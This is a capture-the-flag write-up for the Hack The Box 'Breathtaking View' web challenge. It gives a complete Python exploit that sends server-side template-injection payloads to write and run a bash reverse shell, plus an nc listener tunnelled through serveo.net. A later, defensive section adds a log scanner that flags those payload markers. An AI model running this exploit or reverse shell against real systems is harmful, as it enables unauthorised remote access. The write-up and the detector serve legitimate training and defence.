HackTheBox Breathtaking View Writeup

Explore the basics of cybersecurity in the Breathtaking View Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

nc -lnvp 9001
ssh -R 0:localhost:9001 serveo.net

Ping serveo.net to get its IP address.

import urllib.parse
import requests
import sys

if len(sys.argv) != 3:
    print(f"Usage: {sys.argv[0]} <ip:port> <lhost:lport>")
    sys.exit(1)

host, port = sys.argv[1].split(':')
port = int(port)
base_url = f'http://{host}:{port}'
register_url = f'{base_url}/register'
login_url = f'{base_url}/login'
lhost, lport = sys.argv[2].split(':')
reverse_shell_payload = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
encoded_payload = urllib.parse.quote(reverse_shell_payload)
clean_url = f'{base_url}/?lang=__${{T(Runtime).getRuntime().exec(new+String[]{{"bash","-c","rm+shell.sh"}})}}__::.x'
exploit_url = f'{base_url}/?lang=__${{T(Runtime).getRuntime().exec(new+String[]{{"bash","-c","echo+\'{encoded_payload}\'+%3E+shell.sh"}})}}__::.x'
trigger_url = f'{base_url}/?lang=__${{T(Runtime).getRuntime().exec(new+String[]{{"bash","-c","bash+shell.sh"}})}}__::.x'
session = requests.Session()
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
}
data = {
    'username': 'a',
    'password': 'a'
}

def make_request(url, method='POST', data=None):
    try:
        if method == 'POST':
            response = session.post(url, headers=headers, data=data)
        elif method == 'GET':
            response = session.get(url, headers=headers)
        return response
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
        return None

print("Registering user...")
make_request(register_url, method='POST', data=data)
print("Logging in...")
make_request(login_url, method='POST', data=data)
print("Triggering reverse shell...")
response = make_request(clean_url, method='GET')
response = make_request(exploit_url, method='GET')
response = make_request(trigger_url, method='GET')
print("Exploit triggered. Reverse shell should be active now.")

cat flag.txt

Summary

The Breathtaking View Challenge on Hack The Box is an easy-level challenge focused on web exploitation and reverse shell techniques. It involves setting up a listener with nc and forwarding it via Serveo to expose the local machine to the internet. A Python script is used to exploit a vulnerability in the web app by sending crafted payloads that create and execute a reverse shell (shell.sh) on the server. Once triggered, the reverse shell connects back to the attacker’s machine, allowing access to the flag. This challenge introduces basic concepts of web exploitation, reverse shells, and command injection.
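
The detection side of the requests described above, as an added example that is not part of the original writeup: it percent-decodes each query parameter from an access log and flags the markers visible in the script's `lang` value (the `__${...}__` wrapper, the `T(...)` type reference, and the `Runtime`/`exec` call). The combined log format, the marker names, and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Markers taken from the payload shape in the script above (names are hypothetical):
#   __${ ... }__ wrapper, T(...) type reference, process-execution calls
MARKERS = {
    "preprocess-wrapper": re.compile(r"__\s*[$*#@~]\{.*?\}\s*__", re.S),
    "type-reference": re.compile(r"\bT\s*\("),
    "process-exec": re.compile(r"getRuntime|ProcessBuilder|\.exec\s*\(", re.I),
}

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH) (\S+) HTTP/[\d.]+"')


def score_value(value):
    """Return the names of all markers found in one decoded parameter value."""
    return [name for name, rx in MARKERS.items() if rx.search(value)]


def scan_line(line):
    """Return [(param, [markers])] for each suspicious query parameter in a log line."""
    match = REQUEST.search(line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    findings = []
    # parse_qsl percent-decodes and maps '+' to space, so the encoded
    # form seen in logs is matched the way the server would interpret it
    for name, value in parse_qsl(query, keep_blank_values=True):
        hits = score_value(value)
        if hits:
            findings.append((name, hits))
    return findings


# Constructed sample access-log lines (not captured from the challenge);
# "CMD" is an inert placeholder
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2025:10:00:00 +0000] "GET /?lang=fr HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2025:10:00:05 +0000] "GET /?lang=__$%7BT(Runtime)'
    '.getRuntime().exec(new+String[]%7B%22CMD%22%7D)%7D__::.x HTTP/1.1" 500 0',
    '203.0.113.9 - - [01/Jan/2025:10:00:09 +0000] "POST /login HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        for param, hits in scan_line(entry):
            print(f"ALERT param={param} markers={','.join(hits)} :: {entry[:60]}")
```

A `preprocess-wrapper` hit in any request parameter is worth alerting on by itself, since a legitimate locale value never contains it.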

This post is licensed under CC BY 4.0 by the author.